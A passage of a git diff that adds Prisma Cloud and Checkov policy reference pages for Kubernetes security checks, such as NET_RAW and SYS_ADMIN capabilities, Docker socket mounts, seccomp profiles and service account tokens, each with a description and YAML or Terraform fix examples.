by the Container Runtime. +By default this can include potentially dangerous capabilities. +With Docker as the container runtime the NET_RAW capability is enabled which may be misused by malicious containers. +Ideally, all containers should drop this capability. 
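As an illustration of what "added capabilities" means at the manifest level, the check amounts to reading `securityContext.capabilities.add` on each container. This hypothetical Python sketch is for intuition only and is not the Checkov check linked in the table above:

```python
# Illustrative sketch: list capabilities a container adds beyond the runtime's
# default set (hypothetical helper, not Checkov's actual implementation).

def added_capabilities(container: dict) -> list:
    """Return the Linux capabilities this container adds via its securityContext."""
    caps = (container.get("securityContext") or {}).get("capabilities") or {}
    return list(caps.get("add") or [])


hardened = {"name": "app", "securityContext": {"capabilities": {"add": [], "drop": ["NET_RAW"]}}}
risky = {"name": "dbg", "securityContext": {"capabilities": {"add": ["NET_ADMIN", "SYS_TIME"]}}}
print(added_capabilities(hardened))  # []
print(added_capabilities(risky))     # ['NET_ADMIN', 'SYS_TIME']
```

A container with an empty (or absent) `add` list keeps only the runtime's default capability set, which is what the Terraform fix below enforces with `add = []`.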
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "kubernetes_pod" "pass2" { + metadata { + name = "terraform-example" + } + + + spec { + container { + image = "nginx:1.7.9" + name = "example22" + + security_context { + capabilities { + add = [] + } + + } + + env { + name = "environment" + value = "test" + } + + + port { + container_port = 8080 + } + + + liveness_probe { + http_get { + path = "/nginx_status" + port = 80 + + http_header { + name = "X-Custom-Header" + value = "Awesome" + } + + } + + initial_delay_seconds = 3 + period_seconds = 3 + } + + } + + dns_config { + nameservers = ["1.1.1.1", "8.8.8.8", "9.9.9.9"] + searches = ["example.com"] + + option { + name = "ndots" + value = 1 + } + + + option { + name = "use-vc" + } + + } + + dns_policy = "None" + } + +}", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-25.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-25.adoc new file mode 100644 index 000000000..07d02bd21 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-25.adoc @@ -0,0 +1,63 @@ +== hostPort is specified +// hostPort specified +// Suggest: hostPort exposed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a16803e5-83f1-4d7b-80bc-5bdfd47965a8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/HostPort.py[CKV_K8S_26] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The hostPort setting applies to the Kubernetes containers. The container port will be exposed to the external network at `:`, where the hostIP is the IP address of the Kubernetes node where the container is running, and the hostPort is the port requested by the user. 
+ +We recommend that you do not specify a hostPort for a pod unless it is absolutely necessary. When you bind a pod to a hostPort, it limits the number of places the pod can be scheduled, because each `` combination must be unique. + +NOTE: If you do not specify the hostIP and protocol explicitly, Kubernetes will use 0.0.0.0 as the default hostIP and TCP as the default protocol. This will expose your host to the internet. + + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* hostPort (Optional) + +Defines the number of port to expose on the host. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + ports: +- hostPort: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-26.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-26.adoc new file mode 100644 index 000000000..68c2872ce --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-26.adoc @@ -0,0 +1,95 @@ +== Mounting Docker socket daemon in a container is not limited +// Mounting Docker socket daemon in a container not limited + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 649d6e38-26ce-48a1-9b60-873af3b5f3e4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py[CKV_K8S_27] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Docker runs through a non-networked UNIX socket. +In daemon mode it only allows connections from clients authenticated by a certificate signed by that CA. +This socket can be mounted by other containers unless correct permissions are in place. +Once mounted, the socket can be used to spin up any container, create new images, or shut down existing containers. 
To protect the Docker daemon socket when it is mounted in a container, set appropriate SELinux/AppArmor profiles to limit which containers can mount this socket. + +=== Fix - Buildtime + + +*Kubernetes* + +* *Resource*: Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Argument*: volumes:hostPath (Optional) + +Mounts a file or directory from the host node's filesystem into your Pod. + + +If the path is set to /var/lib/docker, the container has access to Docker internals. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + volumes: + - name: + hostPath: +- path: /var/run/docker.sock +---- + +[source,yaml] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + volumes: + - name: + hostPath: + - path: /var/run/docker.sock +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + volumes: + - name: + hostPath: + - path: /var/run/docker.sock +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-27.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-27.adoc new file mode 100644 index 000000000..a630bbc1c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-27.adoc @@ -0,0 +1,62 @@ +== Admission of containers with NET_RAW capability is not minimized +// Admission of containers with NET_RAW capability not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fca26197-9f75-4188-9a4f-c16f6903479d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py[CKV_K8S_28] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +NET_RAW capability allows the binary to use RAW and
PACKET sockets as well as binding to any address for transparent proxying. +The _ep_ stands for "`effective`" (active) and "`permitted`" (allowed to be used). +With Docker as the container runtime NET_RAW capability is enabled by default and may be misused by malicious containers. +We recommend you define at least one PodSecurityPolicy (PSP) to prevent containers with NET_RAW capability from launching. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* securityContext:capabilities:drop (Optional) Capabilites field allows granting certain privileges to a process without granting all the privileges of the root user. +when *drop* includes *ALL* or *NET_RAW*, the *NET_RAW* capability is disabled. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: + capabilities: + drop: ++ - NET_RAW ++ - ALL +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-28.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-28.adoc new file mode 100644 index 000000000..d5b6c11d8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-28.adoc @@ -0,0 +1,93 @@ +== securityContext is not applied to pods and containers in container context +// securityContext not applied to pods and containers in container context + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9fe4c2a9-e01d-4030-8900-1f1f2cab722f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py[CKV_K8S_30] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +*securityContext* defines privilege and access control settings for your pod or container, and holds security 
configurations that will be applied to a container. +Some fields are present in both *securityContext* and *PodSecurityContext*. When both are set, *securityContext* takes precedence. +Well-defined privilege and access control settings will enhance assurance that your pod is running with the properties it requires to function. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container / Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* securityContext (Optional) A field that defines privilege and access control settings for your Pod or Container. + + +[source,container] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ securityContext: +---- + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: ++ securityContext: +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: ++ securityContext: +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: ++ securityContext: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-29.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-29.adoc new file mode 100644 index 000000000..f62fbabbe --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-29.adoc @@ -0,0 +1,96 @@ +== Seccomp is not set to Docker/Default or Runtime/Default + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fd6729ef-efdb-4fff-9afa-dc005f192ea5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Seccomp.py[CKV_K8S_31] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description 
+ + +Secure computing mode (seccomp) is a Linux kernel feature used to restrict actions available within the container. +The seccomp() system call operates on the seccomp state of the calling process. +The default seccomp profile provides a reliable setting for running containers with seccomp and disables non-essential system calls. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* securityContext: seccompProfile: type: (Optional: Kubernetes > v1.19) Addition of seccompProfile type: RuntimeDefault or DockerDefault + + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ seccompProfile: ++ type: RuntimeDefault + or ++ type: DockerDefault +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + securityContext: ++ seccompProfile: ++ type: RuntimeDefault + or ++ type: DockerDefault +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + securityContext: ++ seccompProfile: ++ type: RuntimeDefault + or ++ type: DockerDefault +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-3.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-3.adoc new file mode 100644 index 000000000..d6e95dfca --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-3.adoc @@ -0,0 +1,99 @@ +== Containers wishing to share host IPC namespace admitted +// Containers allowed to share host IPC namespace + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02c6acab-8581-41b5-922c-91ba79eb0f01 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py[CKV_K8S_3] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The host IPC namespace controls whether a pod's containers can be shared. +You can administer cluster-level restrictions to ensure that containers remain isolated using *PodSecurityPolicy* and ensuring *hostIPC* is set to *False*. +Preventing sharing of host *PID/IPC* namespace, networking, and ports ensures proper isolation between Docker containers and the underlying host. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* hostIPC Determines if the policy allows the use of HostIPC in the pod spec. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ hostIPC: false +---- + + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* must grant access to *use* the desired policies. 
+ +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole** is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-30.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-30.adoc new file mode 100644 index 000000000..8f85d4e7d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-30.adoc @@ -0,0 +1,89 @@ +== seccomp profile is not set to Docker/Default or Runtime/Default +// Secure computing mode (seccomp) profile not set to Docker/Default or Runtime/Default + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 36e37c7d-0a14-4dd9-b96e-f5bfba199223 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py[CKV_K8S_32] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Secure computing mode (seccomp) is a Linux kernel feature used to restrict actions available within the container. +The seccomp() system call operates on the seccomp state of the calling process. +The default seccomp profile provides a reliable setting for running containers with seccomp and disables non-essential system calls.
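This annotation-based variant of the check reads the pod-level seccomp annotation and accepts only the two default profiles named in the title. A hypothetical sketch of that lookup (not Checkov's actual implementation):

```python
# Illustrative sketch of the annotation check described above (hypothetical
# helper, not Checkov's actual implementation).
ANNOTATION = "seccomp.security.alpha.kubernetes.io/pod"
ALLOWED = {"docker/default", "runtime/default"}

def seccomp_annotation_ok(metadata: dict) -> bool:
    """True when the pod pins its seccomp profile to a default profile."""
    return metadata.get("annotations", {}).get(ANNOTATION) in ALLOWED


print(seccomp_annotation_ok({"name": "demo", "annotations": {ANNOTATION: "runtime/default"}}))  # True
print(seccomp_annotation_ok({"name": "demo"}))                                                  # False
```

A missing annotation fails just like a wrong value, so the fix below adds the annotation explicitly.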
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* metadata:annotations (Optional) Annotations attach arbitrary non-identifying metadata to objects. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: + annotations: ++ seccomp.security.alpha.kubernetes.io/pod: "docker/default" + or ++ seccomp.security.alpha.kubernetes.io/pod: "runtime/default" +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + metadata: + annotations: + + seccomp.security.alpha.kubernetes.io/pod: "docker/default" + or + + seccomp.security.alpha.kubernetes.io/pod: "runtime/default" +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + metadata: + annotations: ++ seccomp.security.alpha.kubernetes.io/pod: "docker/default" + or ++ seccomp.security.alpha.kubernetes.io/pod: "runtime/default" +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-31.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-31.adoc new file mode 100644 index 000000000..2077dd20b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-31.adoc @@ -0,0 +1,61 @@ +== Kubernetes dashboard is deployed +// Kubernetes dashboard deployed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e45f89a2-eb9f-4c9e-80d2-feb559094c3a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py[CKV_K8S_33] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +The Terraform provider for Azure enables the capability to disable the Kubernetes 
dashboard on an AKS cluster.
+This is achieved by providing the Kubernetes dashboard as an AKS add-on, similar to the Azure Monitor for containers integration, AKS virtual nodes, and HTTP application routing.
+In 2018 Tesla was hacked when its kube-dashboard was exposed to the internet.
+Hackers browsed around, found credentials, and deployed pods running cryptocurrency mining software.
+We recommend you disable the kube-dashboard if it is not needed, so that you do not have to manage its separate access interface or leave it exposed as an attack vector.
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Container
+* *Arguments:* labels:app / k8s-app - specifies the app label for the pod; image - defines the image used by the container
+
+
+[source,yaml]
+----
+apiVersion: v1
+kind: Pod
+metadata:
+  name:
+  labels:
+- app: kubernetes-dashboard
+- k8s-app: kubernetes-dashboard
+spec:
+  containers:
+  - name:
+- image: kubernetes-dashboard
+- image: kubernetesui
+----
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-32.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-32.adoc
new file mode 100644
index 000000000..4a4317d66
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-32.adoc
@@ -0,0 +1,75 @@
+== Tiller (Helm V2) is deployed
+// Tiller (Helm V2) deployed
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 33a62b66-1d80-43ce-ae26-e0d328c1b402
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Tiller.py[CKV_K8S_34]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+Tiller (Helm v2) is the in-cluster component of Helm.
+It interacts directly with the Kubernetes API server to install, upgrade, query, and remove Kubernetes resources.
+It also stores the objects that represent releases.
+Its permissive configuration could grant users a broad range of permissions.
+Newer versions of Kubernetes and Helm v3 have made Tiller obsolete, but its over-permissive role in existing workloads remains a security liability.
+Consider upgrading to use Helm v3, which only runs on client machines.
+Not all charts may support Helm 3, but the number that do is growing rapidly.
+
+////
+=== Fix - Runtime
+
+
+*CLI Command*
+
+
+`helm reset`
+Or, use `helm reset --force` to force the removal if charts are installed.
+You still need to remove the releases manually.
+////
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Container
+* *Arguments:* labels:app / name - specifies the app label for the pod; image - defines the image used by the container
+
+
+[source,yaml]
+----
+apiVersion: v1
+kind: Pod
+metadata:
+  name:
+  labels:
+- app: helm
+- name: tiller
+spec:
+  containers:
+  - name:
+- image: tiller
+----
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-33.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-33.adoc
new file mode 100644
index 000000000..cfd23d1d5
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-33.adoc
@@ -0,0 +1,77 @@
+== Secrets used as environment variables
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| edf8a515-8e86-4931-bc82-094d5de3258f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/Secrets.py[CKV_K8S_35]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+Secrets can be mounted as data volumes or exposed as environment variables and used by a container in a pod to interact with external systems on your behalf.
+Secrets can also be used by other parts of the system, without being directly exposed to the pod.
+Benefits of storing secrets as files include: setting file permissions, projecting secret keys to specific paths, and consuming secret values from volumes.
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Container
+* *Arguments:* env:valueFrom:secretKeyRef - uses a secret in an environment variable in a Pod; envFrom:secretRef - defines all of the secret's data as the container environment variables
+
+
+[source,valueFrom]
+----
+apiVersion: v1
+kind: Pod
+metadata:
+  name:
+spec:
+  containers:
+  - name:
+    image:
+    env:
+    - name:
+      valueFrom:
+- secretKeyRef:
+- name:
+- key:
+----
+
+
+[source,envFrom]
+----
+apiVersion: v1
+kind: Pod
+metadata:
+  name:
+spec:
+  containers:
+  - name:
+    image:
+    envFrom:
+- - secretRef:
+- name:
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-34.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-34.adoc
new file mode 100644
index 000000000..e25d95394
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-34.adoc
@@ -0,0 +1,63 @@
+== Admission of containers with capabilities assigned is not limited
+// Admission of containers with capabilities assigned not limited
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7d672908-064b-4d17-af1d-bea9d94ebf3f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py[CKV_K8S_37]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+Docker has a default list of capabilities that are allowed for each container of a pod.
+The containers use the capabilities from this default list, but pod manifest authors can alter it by requesting additional capabilities or dropping some of the default capabilities.
+Limiting the admission of containers with capabilities ensures that only a small number of containers have extended capabilities outside the default range.
+This helps ensure that if a container becomes compromised it is unable to provide a productive path for an attacker to move laterally to other containers in the pod.
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Container
+* *Arguments:* securityContext:capabilities:drop (Optional)
+
+The capabilities field allows granting certain privileges to a process without granting all the privileges of the root user.
+When *drop* includes *ALL*, all root privileges are disabled for that container.
+
+
+[source,yaml]
+----
+apiVersion: v1
+kind: Pod
+metadata:
+  name:
+spec:
+  containers:
+  - name:
+    image:
+    securityContext:
+      capabilities:
+        drop:
++ - ALL
+----
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-35.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-35.adoc
new file mode 100644
index 000000000..cad39b114
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-35.adoc
@@ -0,0 +1,83 @@
+== Service account tokens are not mounted where necessary
+// Service Account tokens not mounted where necessary
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c086fb0e-c3eb-47ad-9d70-32e62fd3f467
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py[CKV_K8S_38]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+One way to authenticate to the API is by using the Service Account token.
+*ServiceAccount* is an object managed by Kubernetes and used to provide an identity for processes that run in a pod.
+Every service account has a secret related to it; this secret contains a bearer token.
+This is a JSON Web Token (JWT), a method for representing claims securely between two parties.
+This Service Account token is used during the authentication stage and can become valuable to attackers if the service account is privileged and they have access to such a token.
+With this token an attacker can easily impersonate the service account and use REST APIs.
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob
+* *Arguments:* automountServiceAccountToken (Optional) When set to false, you can opt out of automounting API credentials for a service account.
+
+
+[source,pod]
+----
+apiVersion: v1
+kind: Pod
+metadata:
+  name:
+spec:
++ automountServiceAccountToken: false
+----
+
+[source,cronjob]
+----
+apiVersion: batch/v1beta1
+kind: CronJob
+metadata:
+  name:
+spec:
+  schedule: <>
+  jobTemplate:
+    spec:
+      template:
+        spec:
++ automountServiceAccountToken: false
+----
+
+[source,text]
+----
+apiVersion: <>
+kind:
+metadata:
+  name:
+spec:
+  template:
+    spec:
++ automountServiceAccountToken: false
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-36.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-36.adoc
new file mode 100644
index 000000000..c384a454f
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-36.adoc
@@ -0,0 +1,60 @@
+== CAP_SYS_ADMIN Linux capability is used
+// 'CAP_SYS_ADMIN' Linux capability used
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 367ae3af-e9f6-4c76-a72b-021dfac4e38d
+
+|Checkov Check ID
+|
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py[CKV_K8S_39]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Terraform, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+Capabilities permit certain named root actions without giving full root access and are considered a fine-grained permissions model.
+We recommend all capabilities should be dropped from a pod, with only those required added back.
+There are a large number of capabilities, with CAP_SYS_ADMIN by far the most powerful.
+CAP_SYS_ADMIN is a highly privileged access level equivalent to root access and should generally be avoided.
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Container
+* *Arguments:* securityContext:capabilities:add (Optional) The add field under capabilities allows granting certain privileges to a process.
+
+
+[source,yaml]
+----
+apiVersion: v1
+kind: Pod
+metadata:
+  name:
+spec:
+  containers:
+  - name:
+    image:
+    securityContext:
+      capabilities:
+        add:
+- - SYS_ADMIN
+----
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-37.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-37.adoc
new file mode 100644
index 000000000..22125a77a
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-37.adoc
@@ -0,0 +1,95 @@
+== Containers do not run with a high UID
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1e4d1db0-70d8-4dad-ae2f-f9ce1b06b107
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py[CKV_K8S_40]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+Linux namespaces provide isolation for running processes and limit access to system resources.
+To prevent privilege-escalation attacks from within a container, we recommend that you configure your container's applications to run as unprivileged users.
+The mapped user is assigned a range of UIDs which function within the namespace as normal UIDs from 0 to 65536, but have no privileges on the host machine itself.
+If a process attempts to escalate privilege outside of the namespace, it runs as an unprivileged, high-numbered UID on the host that is not mapped to a real user.
+This means the process has no privileges on the host system, and this method of attack fails.
+This check triggers for UIDs below 10,000, because common Linux distributions assign UID 1000 to the first non-root, non-system user, and 1,000 users should provide a reasonable buffer.
+
+=== Fix - Buildtime
+
+
+*Kubernetes*
+
+
+* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob
+* *Arguments:* runAsUser (Optional) Specifies the User ID that processes within the container and/or pod run with.
+ + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ runAsUser: +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + containers: + - name: + image: + securityContext: ++ runAsUser: +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + containers: + - name: + image: + securityContext: + runAsUser: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-38.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-38.adoc new file mode 100644 index 000000000..9d80bdd5e --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-38.adoc @@ -0,0 +1,98 @@ +== Default service accounts are actively used + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 51515bb4-26e1-4860-8f9e-a31e76f25740 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py[CKV_K8S_41] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, 